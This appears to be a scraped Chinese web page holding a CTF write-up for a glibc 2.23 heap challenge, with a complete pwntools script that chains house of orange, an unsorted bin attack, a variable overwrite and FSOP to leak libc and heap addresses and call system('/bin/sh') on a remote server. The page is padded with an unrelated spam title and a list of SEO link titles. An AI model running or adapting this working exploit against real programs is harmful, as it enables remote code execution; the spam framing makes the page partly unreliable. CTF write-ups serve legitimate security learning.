当前位置: 首页 > news >正文

网站内容采编怎么做百度关键词排名联系

网站内容采编怎么做,百度关键词排名联系,在线制作图片代码,高端网名很经典的house of orange unsortedbin attack FSOP 变量覆盖 不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。 但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢? …

很经典的house of orange + unsortedbin attack +FSOP+ 变量覆盖

不能 free,那首先想到就是 house of orange泄露Libc基址,然后unsortedbin attack。

 

但是只能show(8),就不能用largebin的套路来泄露堆地址了,那怎么办呢?

 

我们注意到这是>,但下标一般是从0开始,所以可能会有变量覆盖,我们看看。

 

果然,第33个chunk的size会覆盖第0个chunk地址的最后一字节,所以我们只需要调试一下,就可以通过show(0)泄露堆地址,其他没什么难度,以下是wp:

from pwn import *
context.arch='amd64'
#io=process('./pwn')
elf=ELF('./pwn')
libc=ELF('./libc-2.23.so')
#libc=elf.libc
io=remote('110.40.35.73',33774)def debug():gdb.attach(io)pause()def inter():io.interactive()def add(size,content):io.recvuntil(b">\n")io.sendline(b'1')io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def edit(idx,size,content):io.recvuntil(b">\n")io.sendline(b'2')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())io.recvuntil(b"Size :\n")io.sendline(str(size).encode())io.recvuntil(b"Content :\n")io.send(content)def show(idx):io.recvuntil(b">\n")io.sendline(b'3')io.recvuntil(b"Index :\n")io.sendline(str(idx).encode())def delete():io.recvuntil(b"please input:\n")io.sendline(b'2')add(0x30,b'aa')#0
#debug()
edit(0,0x40,b'a'*0x38+p64(0xfc1))
add(0x1000,b'aa')#1
#debug()
add(0x10,b'\x78')#2
show(2)
libc_base=u64(io.recv(8))-0x3c4178
print('libc_base:',hex(libc_base))
#debug()
for i in range(29):add(0x1000,b'aa')
add(0x80,b'\x60')#32
#debug()
show(0)
heap=u64(io.recv(8))-0x60
chunk=heap+0xf0
print('heap:',hex(heap))
system=libc_base+libc.sym['system']
pl=b'a'*(0x10+0x90)
#debug()
vtable=chunk+0xe0
print('vtable:',hex(vtable))
iolist=libc_base+libc.sym['_IO_list_all']
payload=b'/bin/sh\x00'+p64(0x61)+p64(0)+p64(iolist-0x10)
payload+=p64(0)+p64(1)
payload=payload.ljust(0xd8,b'\x00')
payload+=p64(vtable)
payload+=p64(0)*3+p64(system)
print(len(payload))
edit(2,0x300,pl+payload)
#debug()
io.recvuntil(b">\n")
io.sendline(b'0'*0x400+b'1')
io.interactive()

 

http://www.tj-hxxt.cn/news/80382.html

相关文章:

  • 帮别人做违法网站中国疾控卫生应急服装
  • 品牌网络营销案例分析廊坊seo培训
  • 1688阿里巴巴官方网站企业网站优化方案案例
  • 可以做视频推广的网站有哪些内容互动营销策略
  • 成都广告公司招聘家居seo整站优化方案
  • 科技感网站设计网站建设步骤流程详细介绍
  • 桂林漓江阳朔一日游旅游攻略宁波seo网站排名
  • 怎么做网站标题优化常州网络推广平台
  • 招一个程序员可以做网站吗成全视频免费观看在线看
  • 建设银行网站注销百度seo指数查询
  • 大兴区制作网站的公司企业管理软件管理系统
  • c2c网站开发策划外贸网络推广怎么做
  • php自己写框架做网站6百度信息流效果怎么样
  • 常用知名购物网站十大收益最好的自媒体平台
  • 自助提卡网站怎么做推广普通话海报
  • 页游赚钱北京seo百科
  • 韶关网站开发优化大师的三大功能
  • 杭州网站建设公司官网搜索引擎整合营销
  • wordpress com org搜seo
  • 房城乡建设部网站今日头条官网登录入口
  • 建设一个网站需要学习什么seo网站排名优化案例
  • 怎样做网站测试拼多多网店代运营要多少费用
  • linux做网站的好处seo标签怎么优化
  • 如何做网站建设怎么开网站
  • 重庆网站推广方法大全semantics
  • 飞言情做最好的言情网站app地推网
  • 郑州汉狮做网站网络公司西安百度框架户
  • 有空间怎么做网站公司怎么建立自己的网站
  • asp.net web网站模板下载2345网址导航是病毒吗
  • 定制服装百度seo公司整站优化